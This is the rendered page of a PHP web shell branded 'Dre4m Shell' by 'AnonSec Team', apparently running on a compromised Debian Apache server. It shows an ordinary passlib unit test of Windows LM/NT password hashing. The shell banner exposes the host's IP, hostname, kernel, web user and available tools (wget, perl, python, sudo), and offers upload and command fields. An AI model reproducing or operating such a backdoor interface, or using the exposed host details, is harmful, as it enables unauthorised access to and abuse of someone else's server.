Dre4m Shell
Server IP : 85.214.239.14  /  Your IP : 3.15.203.0
Web Server : Apache/2.4.62 (Debian)
System : Linux h2886529.stratoserver.net 4.9.0 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : www-data ( 33)
PHP Version : 7.4.18
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
MySQL : OFF  |  cURL : OFF  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /proc/2/task/2/root/srv/radicale/env/lib/python3.5/site-packages/passlib/tests/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /proc/2/task/2/root/srv/radicale/env/lib/python3.5/site-packages/passlib/tests/test_win32.py
"""tests for passlib.win32 -- (c) Assurance Technologies 2003-2009"""
#=============================================================================
# imports
#=============================================================================
# core
import warnings
# site
# pkg
from passlib.tests.utils import TestCase
# module
from passlib.utils.compat import u

#=============================================================================
#
#=============================================================================
class UtilTest(TestCase):
    """test util funcs in passlib.win32"""

    ##test hashes from http://msdn.microsoft.com/en-us/library/cc245828(v=prot.10).aspx
    ## among other places

    def setUp(self):
        super(UtilTest, self).setUp()
        warnings.filterwarnings("ignore",
                                "the 'passlib.win32' module is deprecated")

    def test_lmhash(self):
        from passlib.win32 import raw_lmhash
        for secret, hash in [
            ("OLDPASSWORD", u("c9b81d939d6fd80cd408e6b105741864")),
            ("NEWPASSWORD", u('09eeab5aa415d6e4d408e6b105741864')),
            ("welcome", u("c23413a8a1e7665faad3b435b51404ee")),
            ]:
            result = raw_lmhash(secret, hex=True)
            self.assertEqual(result, hash)

    def test_nthash(self):
        warnings.filterwarnings("ignore",
                                r"nthash\.raw_nthash\(\) is deprecated")
        from passlib.win32 import raw_nthash
        for secret, hash in [
            ("OLDPASSWORD", u("6677b2c394311355b54f25eec5bfacf5")),
            ("NEWPASSWORD", u("256781a62031289d3c2c98c14f1efc8c")),
            ]:
            result = raw_nthash(secret, hex=True)
            self.assertEqual(result, hash)

#=============================================================================
# eof
#=============================================================================

Anon7 - 2022
AnonSec Team